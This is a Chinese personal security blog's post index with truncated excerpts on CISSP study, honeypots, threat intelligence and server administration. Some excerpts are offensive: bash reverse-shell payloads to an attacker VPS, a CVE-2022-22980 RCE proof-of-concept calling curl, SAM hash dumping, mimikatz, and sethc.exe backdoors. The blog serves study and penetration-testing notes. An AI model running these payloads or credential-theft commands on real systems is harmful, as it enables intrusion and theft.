我超怕的

2025年5月6日

摘要：忘了哪里看到的了，很早之前存的，如果作者看到可联系我添加出处或删除权限系统 (注册/注册/二次验证/密码重置) [] 任何地方都使用 HTTPS. [] 使用 Bcrypt 存储密码哈希 (没有使用盐的必要 - Bcrypt 干的就是这个事). [] 登出之后销毁会话 ID . [] 密码重置后销阅读全文

posted @ 2025-05-06 15:13 我超怕的阅读(60) 评论(0) 推荐(0)

2025年4月22日

代码混淆

摘要：代码混淆类型：布局混淆、预防混淆、控制混淆、数据混淆（布尔混淆、数字混淆、字符串、undefined和null）控制混淆不透明谓词 PT恒真，A执行完，必定会执行B，但是链路上增加PT破坏原有结构 PT恒真，但增加Bug代码段，永远不会生效，但攻击者不知道，增加判断量 P？不确定，但B和B’代码阅读全文

posted @ 2025-04-22 14:06 我超怕的阅读(49) 评论(0) 推荐(0)

威胁感知-数据分析常用组件

摘要：蜜罐 Web服务蜜罐 Glastopf SSH蜜罐Kippo RDP蜜罐RDPY 主动欺骗蜜罐Beeswarm（主要针对监听网络流量的场景） Elastcisearch服务蜜罐Elasticpot Modern Honey Network集成了多种蜜罐蜜罐联动：联动WAF，如果蜜罐触发，WAF封阅读全文

posted @ 2025-04-22 14:03 我超怕的阅读(54) 评论(0) 推荐(0)

风控决策引擎

摘要：脚本引擎 apache groovy，可以和java程序无缝融合优点：轻量灵活、简单、学习曲线平滑缺点：实质上是一个脚本引擎功能有限，需要大量开发周边功能开源规则引擎 drools提供核心规则引擎、web编辑界面和规则管理程序，支持决策模型优点：活跃的开源规则引擎、内置rete算法，执行效率阅读全文

posted @ 2025-04-22 13:58 我超怕的阅读(37) 评论(0) 推荐(0)

2025年3月24日

常见开源威胁情报源

摘要： https://www.cnblogs.com/iAmSoScArEd/p/18790153 我超怕的国外（部分非开源，但有免费查询额度） ThreatMiner ：IPv4、FQDN、MD5、SHA2 Alienvault ：IPv4、MD5、SHA2 IBM X-Force ：IPv4 Vi 阅读全文

posted @ 2025-03-24 20:56 我超怕的阅读(145) 评论(0) 推荐(0)

留坑待踩：osquery

摘要： https://www.cnblogs.com/iAmSoScArEd/p/18790130 osquery 用于采集操作系统网络、进程、用户等数据，并提供SQL语法查询各种信息，用于入侵检测、应急响应场景使用。 https://www.osquery.io/ 留位置，待实际部署踩坑。阅读全文

posted @ 2025-03-24 20:47 我超怕的阅读(27) 评论(0) 推荐(0)

安全各类LLM提示词（不定期更新）

摘要：我超怕的-https://www.cnblogs.com/iAmSoScArEd/p/18789376 自己平时使用写的，会根据实际使用情况更新，不全，欢迎补充、优化。代码审计你是一名经验丰富的代码审计专家，你有以下能力： 1、你精通Java、Python、Go等各类主流语言。 2、你知道各类语阅读全文

posted @ 2025-03-24 14:14 我超怕的阅读(195) 评论(0) 推荐(0)

2024年12月31日

CISSP备考经验分享2024年12月

摘要： https://www.cnblogs.com/iAmSoScArEd/p/18644021 我超怕的 CISSP备考经验分享2024年12月考试过了，以下是我的备考经历，不一定适合所有人，所以请按照自己的习惯备考。补充 2025.03.17 关于报名：我是给自己留了3个月时间备考，选了3个月后阅读全文

posted @ 2024-12-31 14:50 我超怕的阅读(561) 评论(0) 推荐(0)

2024年12月1日

CISSP错题或模糊知识（未整理）

摘要：我超怕的- https://www.cnblogs.com/iAmSoScArEd/p/18579786 考试已经通过了，停止更新，感谢。具有公共IP 地址的数据包通常会被允许进入网络，因此您不应创建规则来阻止它们。具有内部源地址的数据包不应来自网络外部，因此应阻止它们进入网络。具有外部源地址阅读全文

posted @ 2024-12-01 14:39 我超怕的阅读(350) 评论(0) 推荐(0)

2024年11月29日

CISSP错题知识点整理

摘要：我超怕的-CISSP错题知识点整理-https://www.cnblogs.com/iAmSoScArEd/p/18576720 考试已经通过了，停止更新，感谢。 1. RADIUS (Remote Authentication Dial-In User Service) 功能主要功能: 集中式身阅读全文

posted @ 2024-11-29 14:39 我超怕的阅读(327) 评论(0) 推荐(0)

2024年11月14日

Linux HTTP代理Squid 基本配置及目标白名单方式限制转发

摘要： Linux HTTP代理Squid 基本变更配置及目标白名单方式限制转发 https://www.cnblogs.com/iAmSoScArEd/p/18546341 大部分保持默认即可 1、文件管理转发白名单 sudo touch /etc/squid/whitelistip sudo touch 阅读全文

posted @ 2024-11-14 16:46 我超怕的阅读(324) 评论(0) 推荐(0)

2024年10月29日

Grafana Nginx 403 Origin not allowed 及 ws websocket连接错误解决

摘要： Grafana Nginx 403 Origin not allowed 及 ws websocket错误解决我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/18514291 注意，这里日志并不全，仅贴了关键解决问题的部分，请勿直接复制粘贴用于生产环境。 ht 阅读全文

posted @ 2024-10-29 19:56 我超怕的阅读(514) 评论(0) 推荐(0)

2024年5月31日

Nginx:a client request body is buffered to a temporary file

摘要： https://www.cnblogs.com/iAmSoScArEd/p/18225191 Nginx warn： 2024/05/31 19:28:37 [warn] 8467#0: *9505669 a client request body is buffered to a temporar 阅读全文

posted @ 2024-05-31 19:37 我超怕的阅读(958) 评论(0) 推荐(0)

2024年4月17日

批量扫描并上报所有服务器已信任的authorized_keys

摘要： https://www.cnblogs.com/iAmSoScArEd/p/18140656 - 我超怕的 code from flask import Flask, request import csv app = Flask(__name__) @app.route('/', methods=[ 阅读全文

posted @ 2024-04-17 14:26 我超怕的阅读(54) 评论(0) 推荐(0)

2023年10月7日

Python简易HTTP文件服务器

摘要：我超怕的 - HTTP simple file server use Python - https://www.cnblogs.com/iAmSoScArEd/p/17745959.html How to use 安装依赖：pip3 install flask 保存到文本simple_file_se 阅读全文

posted @ 2023-10-07 11:50 我超怕的阅读(253) 评论(0) 推荐(0)

2023年9月25日

Linux服务器全用户文件外发行为检测

摘要：我超怕的 -https://www.cnblogs.com/iAmSoScArEd/p/17727571.html Code #!/bin/bash # Specify the directory where user home directories are located USER_HOME_D 阅读全文

posted @ 2023-09-25 11:25 我超怕的阅读(79) 评论(0) 推荐(0)

2023年4月13日

通过进程树监控 Web 应用程序代码执行的命令

摘要：我超怕的 - https://www.cnblogs.com/iAmSoScArEd/p/17315419.html 要通过进程树监控 Web 应用程序代码执行的命令，可以按照以下步骤进行操作：打开终端，并查找正在运行的 Web 应用程序的进程 ID。 ps -ef | grep -i <appl 阅读全文

posted @ 2023-04-13 16:50 我超怕的阅读(101) 评论(0) 推荐(0)

2023年4月4日

权限维持&后门方向速查清单

摘要：我超怕的 - https://www.cnblogs.com/iAmSoScArEd/p/17287883.html Windows主机后门 1、粘滞键替换c:\windows\system32\sethc.exe 为后门程序 2、注册表 HKCU:Software\Microsoft\Windo 阅读全文

posted @ 2023-04-04 20:55 我超怕的阅读(156) 评论(0) 推荐(0)

2023年3月14日

CISSP 思维导图（考试通过，停止更新）

摘要：我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/17213464.html 内容及备注：OSG 第一遍什么时候看：学完速刷回忆以后用快查考试已经通过了，考试经验分享：https://www.cnblogs.com/iAmSoScArEd/p/1864402 阅读全文

posted @ 2023-03-14 00:29 我超怕的阅读(54105) 评论(0) 推荐(0)

2023年3月8日

内网横向攻击提权、命令执行常见工具/渠道

摘要： https://www.cnblogs.com/iAmSoScArEd/p/17189780.html 我超怕的票据传递提权 1、mimikatz主机密码获取、破解、NTLM Hash获取、Hash传递 2、kekeo票据传递 PsExec提权 1、PsExec 在存在ipc的环境下获取目标主机s 阅读全文

posted @ 2023-03-08 21:13 我超怕的阅读(428) 评论(0) 推荐(0)

2023年3月7日

Windows系统LM Hash和NTLM Hash凭证获取方法速查

摘要：我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/17169904.html 凭证获取需要System权限。 1、使用GetPass工具 2、使用PwDump7工具 3、使用QuarksPwDump工具（报毒） 4、使用命令导出 reg save hklm\sam 阅读全文

posted @ 2023-03-07 20:40 我超怕的阅读(398) 评论(0) 推荐(0)

2023年2月26日

横向移动之利用Windows IPC连接执行无图形界面命令行操作

摘要： https://www.cnblogs.com/iAmSoScArEd/p/17156938.html 我超怕的 IPC（Internet Process Connection），用于进程间通信的命名管道。连接目标时需要验证用户名和密码，可以访问目标机器的文件、目录结构、用户等信息。需要目标机器启阅读全文

posted @ 2023-02-26 16:23 我超怕的阅读(247) 评论(0) 推荐(0)

2023年2月20日

Windows内网本地提权的十个方向

摘要： https://www.cnblogs.com/iAmSoScArEd/p/17139141.html 我超怕的前言：仅记录思路方向，具体技术细节可遇到后对照深入研究。如果有补充，非常欢迎大家评论、留言。 1、利用Windows系统漏洞匹配可提权漏洞编号，系统是否缺失该补丁。 1、人工查用sys 阅读全文

posted @ 2023-02-20 22:02 我超怕的阅读(520) 评论(0) 推荐(0)

2023年2月17日

go源码编译步骤

摘要： cd到源码根目录 1、初始化模块，生成依赖module文件go.modgo mod init 源码根目录名 2、下载依赖module go get 3、编译源码，生成可执行文件 go build 后续更新代码，若无外部依赖，可直接go build生成可执行文件，不需要重复执行初始化操作。若新增外部依阅读全文

posted @ 2023-02-17 20:17 我超怕的阅读(233) 评论(0) 推荐(0)

2023年2月14日

ssh隧道

摘要：来自我超怕的 - https://www.cnblogs.com/iAmSoScArEd/p/17120954.html ssh在线官方命令详解 https://man.openbsd.org/ssh 也可以执行 man ssh查看详细命令为什么选择通过SSH隧道转发？隐蔽、普遍。 1、本地转发阅读全文

posted @ 2023-02-14 21:42 我超怕的阅读(347) 评论(0) 推荐(0)

2023年2月9日

netcat入门指南及nc后门的常见利用方式

摘要： netcat入门指南及nc后门的几种利用方式来自 https://www.cnblogs.com/iAmSoScArEd/p/17103315.html - 我超怕的 1、查看nc工具帮助信息 nc -h #后期可以通过该命令查看已经忘记的命令参数，也可以用来探索具体有哪些功能 2、获取部分端口B 阅读全文

posted @ 2023-02-09 22:08 我超怕的阅读(715) 评论(0) 推荐(0)

2022年7月15日

spring data mongodb remote code execution | cve-2022-22980 poc

摘要： spring data mongodb remote code execution | cve-2022-22980 poc # 原payload# T(java.lang.Runtime).getRuntime().exec("curl http://xxx/success") URLencode 阅读全文

posted @ 2022-07-15 14:42 我超怕的阅读(276) 评论(0) 推荐(0)

2022年7月13日

Linux 统计指定目录下文件数量

摘要： # 修改 ./ 为指定路径即可，下面命令默认为当前目录 for i in ./*; do echo $i; find $i | wc -l; done 阅读全文

posted @ 2022-07-13 15:49 我超怕的阅读(199) 评论(0) 推荐(0)

2022年6月17日

Google MFA+Jumpserver自动连接登录

摘要： Google MFA+Jumpserver自动连接 - https://www.cnblogs.com/iAmSoScArEd/p/16387057.html 我超怕的 1、先安装expect Linux CentOS：yum install expect Linux Ubuntu：apt inst 阅读全文

posted @ 2022-06-17 21:07 我超怕的阅读(1097) 评论(0) 推荐(0)

Python获取本周指定的星期几

摘要： https://www.cnblogs.com/iAmSoScArEd/p/16386216.html 我超怕的获取本周星期一 import datetime print(datetime.date.today()-datetime.timedelta(days=datetime.date.tod 阅读全文

posted @ 2022-06-17 16:32 我超怕的阅读(518) 评论(0) 推荐(0)

siege Web压测工具安装、基础使用

摘要： https://www.cnblogs.com/iAmSoScArEd/p/16386193.html 我超怕的下载安装 #下载最新版 wget http://download.joedog.org/siege/siege-latest.tar.gz # 解压 tar -zxvf siege-la 阅读全文

posted @ 2022-06-17 16:28 我超怕的阅读(119) 评论(0) 推荐(0)

2022年5月12日

Python Mysql unsupported format character 'Y' (0x59) at index xx

摘要： https://www.cnblogs.com/iAmSoScArEd/p/16264440.html - 我超怕的报错：Python Mysql unsupported format character 'Y' (0x59) at index xx 报错代码 sql = ''' SELECT D 阅读全文

posted @ 2022-05-12 21:24 我超怕的阅读(951) 评论(0) 推荐(0)

2022年4月16日

LeetCode 代码记录

摘要：我怕超的 - https://www.cnblogs.com/iAmSoScArEd/p/16153162.html 1. 两数之和 https://leetcode-cn.com/problems/two-sum/ 给定一个整数数组 nums 和一个整数目标值 target，请你在该数组中找出和阅读全文

posted @ 2022-04-16 16:02 我超怕的阅读(93) 评论(0) 推荐(0)

2022年2月15日

日志路径及日志分析技巧

摘要：日志默认存放位置：/var/log/ 查看日志配置情况：more /etc/rsyslog.conf 日志文件说明 /var/log/cron 记录了系统定时任务相关的日志 /var/log/cups 记录打印信息的日志 /var/log/dmesg 记录了系统在开机时内核自检的信息，也可以使用dm 阅读全文

posted @ 2022-02-15 18:07 我超怕的阅读(961) 评论(0) 推荐(0)

2022年1月6日

Java任意命令执行漏洞bash反弹shell Payload

摘要：通常1不能直接获取反弹Shell，实战中4很好用 1 bash -i >& /dev/tcp/你的vps ip/监听端口 0>&1 #大部分情况直接执行这个命令不能弹，用下面的 2 Runtime.getRuntime().exec("/bin/bash -c bash${IFS}-i${IFS}> 阅读全文

posted @ 2022-01-06 18:47 我超怕的阅读(1648) 评论(0) 推荐(0)

2021年12月22日

使新添加的.gitignore生效

摘要：进入项目目录后删除缓存 git rm -r --cached . 添加所有文件 git add . commit后生效 git commit -m "make .gitignore work" 阅读全文

posted @ 2021-12-22 16:33 我超怕的阅读(131) 评论(0) 推荐(0)

2021年11月25日

关于netcat(nc)开启监听有趣的发现

摘要：来自-https://www.cnblogs.com/iAmSoScArEd/p/15602016.html -我超怕的大家都知道用nc开启本机端口监听的命令是：nc -l -v -p 6666 都知道-l是开启监听，-v打印运行时的所有信息，-p指定端口通常合起来写：nc -lvp 6666 阅读全文

posted @ 2021-11-25 11:45 我超怕的阅读(1446) 评论(0) 推荐(2)

2021年7月30日

Python3 安装suds失败问题解决

摘要：对于Python3错误： AttributeError: module 'suds' has no attribute 'client' Python3 安装suds失败问题解决： pip uninstall suds pip uninstall client pip install suds-py 阅读全文

posted @ 2021-07-30 12:15 我超怕的阅读(334) 评论(0) 推荐(0)

2021年6月19日

Python pyMongoDB 基础使用模版

摘要： Python pyMongoDB基础使用 - https://www.cnblogs.com/iAmSoScArEd/p/14903131.html -我超怕的当不知道MongoDB中有什么数据库时可使用以下函数查询所有数据库： print(client.database_names()) 当不知阅读全文

posted @ 2021-06-19 15:47 我超怕的阅读(174) 评论(0) 推荐(0)

2021年5月29日

CTF PHP代码审计之常见Hash总结

摘要： CTF PHP代码审计之常见Hash总结 -https://www.cnblogs.com/iAmSoScArEd/p/14825040.html 我超怕的一、MD4 1.1 $a=md4($a) 解决： url?a=0e251288019 url?a=0e898201062 url?a=0e00 阅读全文

posted @ 2021-05-29 12:55 我超怕的阅读(710) 评论(0) 推荐(0)

俗人昭昭，我独昏昏。俗人察察，我独闷闷。

公告